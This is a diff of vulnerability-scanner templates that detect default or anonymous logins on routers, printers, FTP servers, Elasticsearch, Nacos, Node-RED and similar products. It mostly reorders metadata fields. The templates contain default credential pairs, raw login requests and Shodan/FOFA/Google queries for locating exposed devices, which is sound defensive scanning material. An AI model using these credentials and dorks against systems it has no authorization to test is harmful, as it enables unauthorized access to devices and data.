+# digest: 4a0a00473045022100e2f0325cd0d99bcd7a23cd738065048220ea18532e54ce329ccfb3bb44866d9602202efadadca274034c7078a8104fc4df513dba2c17d33d76d104490d8cd85db915:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/asus/asus-rtn16-default-login.yaml
+++ b/http/default-logins/asus/asus-rtn16-default-login.yaml
@ -6,16 +6,16 @@ info:
  severity: high
  description: |
    ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found.
+  classification:
+    cpe: cpe:2.3:h:asus:rt-n16:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: "RT-N16"
-    product: rt-n16
    vendor: asus
+    product: rt-n16
+    shodan-query: "RT-N16"
  tags: default-login,asus,rt-n16

-  classification:
-    cpe: cpe:2.3:h:asus:rt-n16:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -44,4 +44,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/barco-clickshare-default-login.yaml
+++ b/http/default-logins/barco-clickshare-default-login.yaml
@ -6,28 +6,26 @@ info:
  severity: high
  description: |
    Barco ClickShare contains a default login vulnerability. Default login password 'admin' was found.
-  metadata:
-    max-request: 3
-    shodan-query: "ClickShareSession"
-    product: clickshare_cs-100_huddle_firmware
-    vendor: barco
-  tags: default-login,barco,clickshare
-
  classification:
    cpe: cpe:2.3:o:barco:clickshare_cs-100_huddle_firmware:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 3
+    vendor: barco
+    product: clickshare_cs-100_huddle_firmware
+    shodan-query: "ClickShareSession"
+  tags: default-login,barco,clickshare
+
 http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}
-
      - |
        POST /login/log_me_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_protection_token={{token}}&username={{username}}&password={{password}}&eula_accepted=true
-
      - |
        GET /configuration_wizard HTTP/1.1
        Host: {{Hostname}}
@ -38,7 +36,6 @@ http:
        - admin
      password:
        - admin
-
    matchers:
      - type: dsl
        dsl:
@ -55,4 +52,5 @@ http:
        regex:
          - '="csrf_protection_token" value="([0-9a-z]+)" \/>'
        internal: true
-# digest: 490a004630440220110d1053dd5b584c6b956c2a7dd5cab571c2d140f37443d9e2c36d2897de6278022019c145b0a677c04a818d1cf14b7150105adb9ad64809c40f071a61232af232ef:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220110d1053dd5b584c6b956c2a7dd5cab571c2d140f37443d9e2c36d2897de6278022019c145b0a677c04a818d1cf14b7150105adb9ad64809c40f071a61232af232ef:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/batflat/batflat-default-login.yaml
+++ b/http/default-logins/batflat/batflat-default-login.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://www.exploitalert.com/view-details.html?id=34749
    - https://cxsecurity.com/issue/WLB-2020010100
+  classification:
+    cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    google-query: intext:"Powered by Batflat."
-    product: batflat
    vendor: batflat
+    product: batflat
+    google-query: intext:"Powered by Batflat."
  tags: default-login,batflat

-  classification:
-    cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -43,4 +43,4 @@ http:
          - 'contains(body, "Batflat - Dashboard")'
        condition: and

-# digest: 490a0046304402201fd494d4a966f5e9588e9814d7f91e2b59c07416531b6f9c5656c76ea3ddcfef0220164999871087cfeb8221bedaf5d22d4aa2c452d80653fefac3c3032c89f443d0:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402201fd494d4a966f5e9588e9814d7f91e2b59c07416531b6f9c5656c76ea3ddcfef0220164999871087cfeb8221bedaf5d22d4aa2c452d80653fefac3c3032c89f443d0:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/bloofoxcms-default-login.yaml
+++ b/http/default-logins/bloofoxcms-default-login.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://www.bloofox.com/automated_setup.113.html
    - https://www.bloofox.com
+  classification:
+    cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
-    fofa-query: "Powered by bloofoxCMS"
-    product: bloofoxcms
    vendor: bloofox
+    product: bloofoxcms
+    fofa-query: "Powered by bloofoxCMS"
  tags: bloofox,cms,default-login

-  classification:
-    cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -43,4 +43,4 @@ http:
          - status_code == 200
        condition: and

-# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml
+++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml
@ -6,23 +6,21 @@ info:
  severity: high
  description: |
    CrushFTP Anonymous login credentials were discovered.
+  classification:
+    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: html:"CrushFTP"
-    product: crushftp
    vendor: crushftp
+    product: crushftp
+    shodan-query: html:"CrushFTP"
  tags: default-logins,anonymous,crushftp,default-login

-  classification:
-    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
        GET /WebInterface/ HTTP/1.1
        Host: {{Hostname}}
-
-
      - |
        POST /WebInterface/function/ HTTP/1.1
        Host: {{Hostname}}
@ -42,7 +40,6 @@ http:
        words:
          - "text/xml"

-
    extractors:
      - type: regex
        name: auth
@ -51,4 +48,5 @@ http:
        group: 1
        regex:
          - 'currentAuth=([0-9a-zA-Z]+)'
-# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/crushftp/crushftp-default-login.yaml
+++ b/http/default-logins/crushftp/crushftp-default-login.yaml
@ -6,23 +6,21 @@ info:
  severity: high
  description: |
    CrushFTP default login credentials were discovered.
+  classification:
+    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: html:"CrushFTP"
-    product: crushftp
    vendor: crushftp
+    product: crushftp
+    shodan-query: html:"CrushFTP"
  tags: default-login,crushftp

-  classification:
-    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
        GET /WebInterface/ HTTP/1.1
        Host: {{Hostname}}
-
-
      - |
        POST /WebInterface/function/ HTTP/1.1
        Host: {{Hostname}}
@ -31,15 +29,14 @@ http:

        command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926

-
    attack: pitchfork
    payloads:
      username:
        - crushadmin
      password:
        - crushadmin
-
    stop-at-first-match: true
+
    matchers-condition: and
    matchers:
      - type: word
@ -60,4 +57,5 @@ http:
        group: 1
        regex:
          - 'currentAuth=([0-9a-zA-Z]+)'
-# digest: 4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/dataease/dataease-default-login.yaml
+++ b/http/default-logins/dataease/dataease-default-login.yaml
@ -9,16 +9,16 @@ info:
    As a result, many Dataease can log in with this built-in account.
  reference:
    - https://github.com/dataease/dataease/issues/5995
+  classification:
+    cpe: cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: html:"Dataease"
-    product: dataease
    vendor: dataease_project
+    product: dataease
+    shodan-query: html:"Dataease"
  tags: default-login,dataease

-  classification:
-    cpe: cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:*
 http:
  - method: POST
    path:
@ -46,4 +46,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml
+++ b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610
    - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html
+  classification:
+    cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667
-    product: elasticsearch
    vendor: elastic
+    product: elasticsearch
+    shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667
  tags: default-login,elasticsearch

-  classification:
-    cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -54,4 +54,4 @@ http:
        status:
          - 200

-# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/esafenet-cdg-default-login.yaml
+++ b/http/default-logins/esafenet-cdg-default-login.yaml
@ -6,16 +6,16 @@ info:
  severity: high
  description: |
    Esafenet electronic document security management system default  credentials were discovered.
+  classification:
+    cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 32
-    fofa-query: esafenet
-    product: cdg
    vendor: esafenet
+    product: cdg
+    fofa-query: esafenet
  tags: esafenet,cdg,default-login

-  classification:
-    cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
 http:
  - method: POST
    path:
@ -57,4 +57,4 @@ http:
        status:
          - 200

-# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/eurotel/etl3100-default-login.yaml
+++ b/http/default-logins/eurotel/etl3100-default-login.yaml
@ -9,17 +9,17 @@ info:
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
    - https://www.exploit-db.com/exploits/51684
+  classification:
+    cpe: cpe:2.3:h:eurotel:etl3100:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
+    vendor: eurotel
+    product: etl3100
    shodan-query: html:"ETL3100"
    fofa-query: body="ETL3100"
-    product: etl3100
-    vendor: eurotel
  tags: misconfig,default-login,eurotel

-  classification:
-    cpe: cpe:2.3:h:eurotel:etl3100:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -46,4 +46,4 @@ http:
          - 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")'
        condition: and

-# digest: 4a0a00473045022100e1b485875e9a95c6bc7e5419031120cf28227436b5582be699663c9c6c30bc2a02204e3000fba07b11212721e1ffbfffdcc3b5aec852c2af6860eb564d491bc2f0e4:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e1b485875e9a95c6bc7e5419031120cf28227436b5582be699663c9c6c30bc2a02204e3000fba07b11212721e1ffbfffdcc3b5aec852c2af6860eb564d491bc2f0e4:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml
+++ b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml
@ -8,16 +8,16 @@ info:
    Attackers can log in through admin:admin, check the system status, and configure the device.
  reference:
    - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py
+  classification:
+    cpe: cpe:2.3:h:feiyuxing:vec40g:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: title="飞鱼星企业级智能上网行为管理系统"
-    product: vec40g
    vendor: feiyuxing
+    product: vec40g
+    fofa-query: title="飞鱼星企业级智能上网行为管理系统"
  tags: feiyuxing,default-login,iot

-  classification:
-    cpe: cpe:2.3:h:feiyuxing:vec40g:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -52,4 +52,4 @@ http:
        status:
          - 200

-# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/franklin-fueling-default-login.yaml
+++ b/http/default-logins/franklin-fueling-default-login.yaml
@ -8,16 +8,16 @@ info:
    A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39466
+  classification:
+    cpe: cpe:2.3:o:franklinfueling:ts-550_evo_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    google-query: inurl:"relay_status.html"
-    product: ts-550_evo_firmware
    vendor: franklinfueling
+    product: ts-550_evo_firmware
+    google-query: inurl:"relay_status.html"
  tags: default-login,franklin

-  classification:
-    cpe: cpe:2.3:o:franklinfueling:ts-550_evo_firmware:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -44,4 +44,4 @@ http:
          - 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")'
        condition: and

-# digest: 4b0a00483046022100d5fb1d6e90816511a5ca93642f672cdf7dac17f76021b2e075536aa8ff53569a022100b25f24690490e8a5c05269f473a92f475477111a20a37dfc80da558bd20ff70d:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100d5fb1d6e90816511a5ca93642f672cdf7dac17f76021b2e075536aa8ff53569a022100b25f24690490e8a5c05269f473a92f475477111a20a37dfc80da558bd20ff70d:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml
+++ b/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml
@ -8,16 +8,16 @@ info:
    This template checks for the default credentials (username: 11111, password: x-admin) on Fuji Xerox ApeosPort series printers. If the credentials are valid, the response will have a 200 HTTP status code. Tested on a Fuji Xerox ApeosPort-V C2275 T2.
  reference:
    - https://4it.com.au/kb/article/fuji-xerox-default-password/
-  metadata:
-    max-request: 1
-    verified: true
-    vendor: fujixerox
-    fofa-query: '"prop.htm" && "docucentre"'
-    product: apeosport-v_c3375
-  tags: default-login,fuji,fuji-xerox,printer
-
  classification:
    cpe: cpe:2.3:h:fujixerox:apeosport-v_c3375:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: fujixerox
+    product: apeosport-v_c3375
+    fofa-query: '"prop.htm" && "docucentre"'
+  tags: default-login,fuji,fuji-xerox,printer
+
 http:
  - raw:
      - |
@ -39,4 +39,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022021dddab097e239a58636b5c6b839cb7e8e8217298f30238bc710a0d23916c515022100a53010047899140f9321c168495bd9117f6b5989d5a0c51d773d10034cfac106:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022021dddab097e239a58636b5c6b839cb7e8e8217298f30238bc710a0d23916c515022100a53010047899140f9321c168495bd9117f6b5989d5a0c51d773d10034cfac106:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/gitblit/gitblit-default-login.yaml
+++ b/http/default-logins/gitblit/gitblit-default-login.yaml
@ -8,16 +8,16 @@ info:
    Gitblit Default login credentials were discovered.
  reference:
    - https://www.gitblit.com/administration.html
-  metadata:
-    max-request: 1
-    verified: true
-    shodan-query: title:"Gitblit"
-    product: gitblit
-    vendor: gitblit
-  tags: gitblit,default-login
-
  classification:
    cpe: cpe:2.3:a:gitblit:gitblit:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: gitblit
+    product: gitblit
+    shodan-query: title:"Gitblit"
+  tags: gitblit,default-login
+
 http:
  - raw:
      - |
@ -50,4 +50,5 @@ http:
      - type: dsl
        dsl:
          - "len(body) == 0"
-# digest: 4a0a004730450220691d3ee89f1594b342246ca8ab8be803b73a21e02aba3351ad7b37b30b3f6212022100cc37beb5ccfc7c249f775ab36ff557cd283ed426c4481be17cf0ac8c03dd6307:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220691d3ee89f1594b342246ca8ab8be803b73a21e02aba3351ad7b37b30b3f6212022100cc37beb5ccfc7c249f775ab36ff557cd283ed426c4481be17cf0ac8c03dd6307:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml
+++ b/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml
@ -6,16 +6,16 @@ info:
  severity: high
  description: |
    ISPConfig Hosting Control Panel Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
-  metadata:
-    shodan-query: title:"ISPConfig" http.favicon.hash:483383992
-    verified: true
-    max-request: 1
-    product: ispconfig
-    vendor: ispconfig
-  tags: ispconfig,hsp,default-login
-
  classification:
    cpe: cpe:2.3:a:ispconfig:ispconfig:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: ispconfig
+    product: ispconfig
+    shodan-query: title:"ISPConfig" http.favicon.hash:483383992
+  tags: ispconfig,hsp,default-login
+
 http:
  - raw:
      - |
@ -47,4 +47,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a00483046022100e7b51ff042816b2a91fc83f9eb1d6a699a9f1d9ce697b576f832ba2df52b54f6022100f76011928c63307d6c2770a217a88ae56963db3bc1fc5beac17f2e64fb95acbd:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e7b51ff042816b2a91fc83f9eb1d6a699a9f1d9ce697b576f832ba2df52b54f6022100f76011928c63307d6c2770a217a88ae56963db3bc1fc5beac17f2e64fb95acbd:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/jeedom/jeedom-default-login.yaml
+++ b/http/default-logins/jeedom/jeedom-default-login.yaml
@ -6,16 +6,15 @@ info:
  severity: high
  description: |
    Jeedom default login has been detected.
+  classification:
+    cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: title:"Jeedom"
-    product: jeedom
    vendor: jeedom
+    product: jeedom
+    shodan-query: title:"Jeedom"
  tags: jeedom,default-login,misconfig
-
-  classification:
-    cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
 variables:
  username: admin
  password: admin
@ -28,7 +27,6 @@ http:
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=login&username={{username}}&password={{password}}&twoFactorCode=&storeConnection=0
-
      - |
        GET /index.php?v=d&p=dashboard HTTP/1.1
        Host: {{Hostname}}
@ -48,4 +46,5 @@ http:
          - "logout=1"
          - "Plugins</span>"
        condition: and
-# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml
+++ b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml
@ -6,16 +6,16 @@ info:
  severity: medium
  description: |
    mantisbt Anonymous login were discovered.
+  classification:
+    cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:662709064
-    product: mantisbt
    vendor: mantisbt
+    product: mantisbt
+    shodan-query: http.favicon.hash:662709064
  tags: default-logins,anonymous,mantisbt,default-login

-  classification:
-    cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -34,4 +34,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/nacos/nacos-default-login.yaml
+++ b/http/default-logins/nacos/nacos-default-login.yaml
@ -6,16 +6,16 @@ info:
  severity: high
  description: |
    The default username and password for Nacos are both nacos.
+  classification:
+    cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    fofa-query: title=="Nacos"
-    product: nacos
    vendor: alibaba
+    product: nacos
+    fofa-query: title=="Nacos"
  tags: nacos,default-login,alibaba

-  classification:
-    cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -59,4 +59,4 @@ http:
        status:
          - 200

-# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/netflow/netflow-default-login.yaml
+++ b/http/default-logins/netflow/netflow-default-login.yaml
@ -6,16 +6,16 @@ info:
  severity: high
  description: |
    Netflow Analyzer default login was discovered.
+  classification:
+    cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: html:"Login - Netflow Analyzer"
-    product: manageengine_netflow_analyzer
    vendor: zohocorp
+    product: manageengine_netflow_analyzer
+    shodan-query: html:"Login - Netflow Analyzer"
  tags: default-login,netflow,misconfig

-  classification:
-    cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -45,4 +45,5 @@ http:
        part: location
        words:
          - "/netflow;jsessionid"
-# digest: 4b0a00483046022100a6e60cf558d5d6383bae690c8c770dbe0656def6cd80d1ddb7dfa85fe6ed1798022100d4981c561c132ddd0fab88f05be6f7d771c891e7958877ee6bcdf6725f637729:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100a6e60cf558d5d6383bae690c8c770dbe0656def6cd80d1ddb7dfa85fe6ed1798022100d4981c561c132ddd0fab88f05be6f7d771c891e7958877ee6bcdf6725f637729:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/node-red/nodered-default-login.yaml
+++ b/http/default-logins/node-red/nodered-default-login.yaml
@ -8,16 +8,16 @@ info:
    Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials.
  reference:
    - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/
+  classification:
+    cpe: cpe:2.3:a:nodered:node-red:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:321591353
-    product: node-red
    vendor: nodered
+    product: node-red
+    shodan-query: http.favicon.hash:321591353
  tags: default-login,node-red,dashboard

-  classification:
-    cpe: cpe:2.3:a:nodered:node-red:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -52,4 +52,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/o2oa/o2oa-default-login.yaml
+++ b/http/default-logins/o2oa/o2oa-default-login.yaml
@ -6,16 +6,16 @@ info:
  severity: high
  description: |
    O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises.
+  classification:
+    cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title=="O2OA"
-    product: o2oa
    vendor: zoneland
+    product: o2oa
+    shodan-query: title=="O2OA"
  tags: o2oa,default-login

-  classification:
-    cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -53,4 +53,4 @@ http:
        status:
          - 200

-# digest: 4a0a004730450220303448d4f063d3751339583dd30660c6c6c9cac3c3b3d566ffa9e589e4d6e1e30221009b62a303a85637afb15080524b83b3cd1005731fb64cb95dce721ecbb6325701:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220303448d4f063d3751339583dd30660c6c6c9cac3c3b3d566ffa9e589e4d6e1e30221009b62a303a85637afb15080524b83b3cd1005731fb64cb95dce721ecbb6325701:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/others/aruba-instant-default-login.yaml
+++ b/http/default-logins/others/aruba-instant-default-login.yaml
@ -8,16 +8,16 @@ info:
    Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
  reference:
    - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router.
+  classification:
+    cpe: cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
-    product: aruba_instant
    vendor: arubanetworks
+    product: aruba_instant
+    fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
  tags: aruba,default-login

-  classification:
-    cpe: cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -41,4 +41,4 @@ http:
          - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")'
        condition: and

-# digest: 4a0a00473045022100ced4e051d16f58cbefe47b2e6d4acfb6f917418ea7694c5248d757815146178f02200e8ff5e2a45e4224bf56d9e4d5a2bb7ec6ea6c15cbf45fcdaf10431d404c9481:922c64590222798bb761d5b6d8e72950
